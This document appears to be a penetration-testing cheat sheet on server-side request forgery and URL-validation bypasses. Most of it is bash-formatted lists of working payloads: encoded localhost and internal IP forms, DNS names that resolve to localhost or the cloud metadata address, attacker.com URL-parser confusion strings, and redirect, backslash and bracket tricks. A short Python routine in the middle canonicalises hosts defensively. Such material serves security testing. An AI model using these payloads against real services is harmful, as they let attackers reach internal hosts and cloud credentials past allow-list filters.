```bash
# Localhost
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.1:80
http://127.000000000000000.1
http://0
http:@0/ --> http://localhost/
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
http://①②⑦.⓪.⓪.⓪

# CDIR bypass
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

# Dot bypass
127。0。0。1
127%E3%80%820%E3%80%820%E3%80%821

# Decimal bypass
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1

# Octal Bypass
http://0177.0000.0000.0001
http://00000177.00000000.00000000.00000001
http://017700000001

# Hexadecimal bypass
127.0.0.1 = 0x7f000001
http://0x7f000001/ = http://127.0.0.1
http://0xc0a80014/ = http://192.168.0.20
0x7f.0x00.0x00.0x01
0x0000007f.0x00000000.0x00000000.0x00000001

# Mixed encodings bypass
169.254.43518 -> Partial Decimal (Class B) format combines the third and fourth parts of the IP address into a decimal number
0xA9.254.0251.0376 -> hexadecimal, decimal and octal

# Add 0s bypass
127.000000000000.1

# You can also mix different encoding formats
# https://www.silisoftware.com/tools/ipconverter.php

# Malformed and rare
localhost:+11211aaa
localhost:00011211aaaa
http://0/
http://127.1
http://127.0.1

# DNS to localhost
localtest.me = 127.0.0.1
customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
mail.ebc.apple.com = 127.0.0.6 (localhost)
127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://bugbounty.dod.network = 127.0.0.2 (localhost)
1ynrnhl.xip.io == 169.254.169.254
spoofed.burpcollaborator.net = 127.0.0.1
```
The Burp extension Burp-Encode-IP implements these IP-formatting bypasses.
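As an added example (not from the original page or from any tool it mentions), the defender-side check that these encodings defeat when done by string comparison: canonicalise the host the way the fetching stack will, by re-implementing the permissive inet_aton() grammar behind the decimal, octal, hex, short and mixed forms above and applying the IDNA mapping behind the dot and circled-digit bypasses, then test the resulting address rather than the raw URL. Hostnames are returned unresolved so the same test can be run on every DNS record.

```python
import ipaddress
import re
from typing import Optional, Union
from urllib.parse import unquote, urlsplit

_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")  # hex | octal | decimal, as C strtoul()

def _c_int(part: str) -> int:
    return int(part[2:], 16) if part[:2].lower() == "0x" else int(part, 8 if part[0] == "0" else 10)

def inet_aton_loose(host: str) -> Optional[ipaddress.IPv4Address]:
    """inet_aton() grammar: 1 to 4 dotted parts, the last filling every remaining
    byte, so 127.1, 2130706433, 0x7f000001 and 169.254.43518 all reach internal hosts."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.match(p) for p in parts):
        return None                      # not an IPv4 literal (a hostname, or junk)
    values = [_c_int(p) for p in parts]
    tail_bits = 32 - 8 * (len(parts) - 1)
    if any(v > 0xFF for v in values[:-1]) or values[-1] >> tail_bits:
        return None                      # a part overflows its byte(s)
    packed = 0
    for v in values[:-1]:
        packed = (packed << 8) | v
    return ipaddress.IPv4Address((packed << tail_bits) | values[-1])

def canonical_host(url: str) -> Union[ipaddress.IPv4Address, ipaddress.IPv6Address, str]:
    """The address the fetcher will really contact, or the hostname as str when DNS
    is still needed (resolve it and re-check every record: nip.io maps any label)."""
    host = unquote(urlsplit(url).hostname or "")
    try:
        host = host.encode("idna").decode("ascii")  # 127。0。0。1, ①②⑦.⓪.⓪.⓪ -> dotted quad
    except UnicodeError:
        pass                                        # malformed name: leave it to the resolver
    addr = inet_aton_loose(host)
    if addr is None:
        try:
            addr = ipaddress.ip_address(host)       # IPv6 literal: "::", "0000::1", v4-mapped
        except ValueError:
            return host                             # a name: resolve it, re-check every record
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        return addr.ipv4_mapped                     # [0:0:0:0:0:ffff:127.0.0.1] -> 127.0.0.1
    return addr

def literal_is_internal(url: str) -> Optional[bool]:
    """True/False for an IP literal; None when the host still needs DNS resolution."""
    target = canonical_host(url)
    if isinstance(target, str):
        return None
    return (target.is_loopback or target.is_unspecified or target.is_link_local
            or target.is_private or target.is_reserved or target.is_multicast)
```

Matching the raw URL against the string 127.0.0.1 misses every form in the block above; compare after canonicalisation, and re-validate the address the client actually connects to so that DNS answers and redirects cannot swap it afterwards.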
```bash
# Try also to change attacker.com for 127.0.0.1 to try to access localhost
# Try replacing https by http
# Try URL-encoded characters
https://{domain}@attacker.com
https://{domain}.attacker.com
https://{domain}%6D@attacker.com
https://attacker.com/{domain}
https://attacker.com/?d={domain}
https://attacker.com#{domain}
https://attacker.com@{domain}
https://attacker.com#@{domain}
https://attacker.com%23@{domain}
https://attacker.com%00{domain}
https://attacker.com%0A{domain}
https://attacker.com?{domain}
https://attacker.com///{domain}
https://attacker.com\{domain}/
https://attacker.com;https://{domain}
https://attacker.com\.{domain}
https://attacker.com/.{domain}
https://attacker.com\@@{domain}
https://attacker.com:\@@{domain}
https://attacker.com#\@{domain}
https://attacker.com\anything@{domain}/
https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com

# On each IP position try to put 1 attackers domain and the others the victim domain
http://1.1.1.1&@2.2.2.2#@3.3.3.3/

# Parameter pollution
next={domain}&next=attacker.com
```
Paths and Extensions Bypass
If the URL is required to end in a path or extension, or to contain a path, you can try one of the following bypasses:
The tool recollapse can generate variations of a given input to try to bypass the regex in use. Check this post too for more information.
Automatic Custom Wordlists
Check the URL validation bypass cheat sheet webapp from PortSwigger, where you can enter the allowed host and the attacker's host and it generates a list of URLs for you to try. It also takes into account whether the URL can be used in a parameter, in the Host header or in a CORS header.
Bypass via redirect
The server may filter the original SSRF request but not a redirect response returned for that request.
For example, a server vulnerable to SSRF via url=https://www.google.com/ may be filtering the url parameter. But if you use a Python server that answers with a 302 to the location you want to reach, you may be able to access filtered IP addresses such as 127.0.0.1, or even filtered protocols such as gopher.
Check out this report.
The backslash-trick exploits a difference between the WHATWG URL Standard and RFC 3986. While RFC 3986 is a general framework for URIs, WHATWG is specific to web URLs and is adopted by modern browsers. The key difference is that the WHATWG standard treats the backslash (\) as equivalent to the forward slash (/), which affects how URLs are parsed, specifically where the transition from the hostname to the path is recognised.
Left square bracket
The "left square bracket" character [ in the userinfo segment can cause Spring's UriComponentsBuilder to return a hostname value that differs from what browsers use: https://example.com[@attacker.com